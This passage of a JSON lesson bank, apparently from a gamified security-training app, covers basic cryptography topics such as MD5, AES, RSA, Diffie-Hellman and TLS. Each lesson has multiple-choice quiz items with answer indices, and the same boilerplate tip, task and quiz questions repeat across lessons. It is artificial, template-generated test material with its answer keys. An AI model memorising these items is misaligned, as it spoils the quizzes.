proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-md5-weakness","cat":"Cryptography","title":"MD5 Weaknesses","diff":1,"xp":75,"intro":"Why MD5 is broken and should never be used for security.","sections":[{"type":"text","content":"Why MD5 is broken and should never be used for security."},{"type":"code","lang":"bash","content":"MD5 collisions can be generated in seconds. Not safe for passwords, signatures, or integrity"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"MD5 is broken because...","opts":["It's slow","Collisions can be generated trivially","It's too long","It uses too much memory"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-aes-detail","cat":"Cryptography","title":"AES Algorithm Details","diff":2,"xp":150,"intro":"How AES works: SubBytes, ShiftRows, MixColumns, AddRoundKey.","sections":[{"type":"text","content":"How AES works: SubBytes, ShiftRows, MixColumns, AddRoundKey."},{"type":"code","lang":"bash","content":"AES operates on a 4x4 byte state matrix through 10/12/14 rounds depending on key size"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"AES-256 uses how many rounds?","opts":["10","12","14","16"],"ans":2},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-rsa-detail","cat":"Cryptography","title":"RSA Algorithm Details","diff":2,"xp":150,"intro":"The math behind RSA: primes, modular arithmetic, and key generation.","sections":[{"type":"text","content":"The math behind RSA: primes, modular arithmetic, and key generation."},{"type":"code","lang":"bash","content":"n=p*q, phi=(p-1)(q-1), e=65537, d=e^-1 mod phi. Encrypt: c=m^e mod n"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"RSA security relies on...","opts":["Hashing","Difficulty of factoring large numbers","Symmetric keys","Random numbers"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-dh-detail","cat":"Cryptography","title":"Diffie-Hellman Explained","diff":2,"xp":150,"intro":"How two parties establish a shared secret over public channel.","sections":[{"type":"text","content":"How two parties establish a shared secret over public channel."},{"type":"code","lang":"bash","content":"Both pick secrets, compute public values, exchange, and derive the same shared secret"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"DH is vulnerable to...","opts":["Brute force","Man-in-the-middle (no authentication built in)","Replay attacks","DNS attacks"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-tls-versions","cat":"Cryptography","title":"TLS Version Comparison","diff":1,"xp":75,"intro":"SSLv2/3, TLS 1.0/1.1/1.2/1.3 \u2014 what's safe and what's not.","sections":[{"type":"text","content":"SSLv2/3, TLS 1.0/1.1/1.2/1.3 \u2014 what's safe and what's not."},{"type":"code","lang":"bash","content":"SSLv2/3: broken. TLS 1.0/1.1: deprecated. TLS 1.2: minimum. TLS 1.3: best"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Current minimum TLS version?","opts":["SSLv3","TLS 1.0","TLS 1.2","TLS 1.3"],"ans":2},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-kdf","cat":"Cryptography","title":"Key Derivation Functions","diff":2,"xp":150,"intro":"PBKDF2, scrypt, Argon2 \u2014 derive strong keys from passwords.","sections":[{"type":"text","content":"PBKDF2, scrypt, Argon2 \u2014 derive strong keys from passwords."},{"type":"code","lang":"bash","content":"KDFs add salt and iteration to make brute force impractical"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"KDFs are slow on purpose to...","opts":["Save memory","Make brute force impractical","Reduce key size","Improve compatibility"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-digital-sig","cat":"Cryptography","title":"Digital Signatures Explained","diff":1,"xp":75,"intro":"Sign with private key, verify with public key.","sections":[{"type":"text","content":"Sign with private key, verify with public key."},{"type":"code","lang":"bash","content":"Proves authorship and integrity \u2014 only the private key holder can create valid signatures"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Signing uses which key?","opts":["Public","Private","Shared","Session"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-cert-chain","cat":"Cryptography","title":"Certificate Chain of Trust","diff":2,"xp":150,"intro":"Root CA -> Intermediate CA -> Leaf cert.","sections":[{"type":"text","content":"Root CA -> Intermediate CA -> Leaf cert."},{"type":"code","lang":"bash","content":"Browser trusts root CAs. They sign intermediates. Intermediates sign server certs"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"The root CA is trusted because...","opts":["The server sends it","It's pre-installed in the OS/browser","The user approves it","It's self-signed"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks 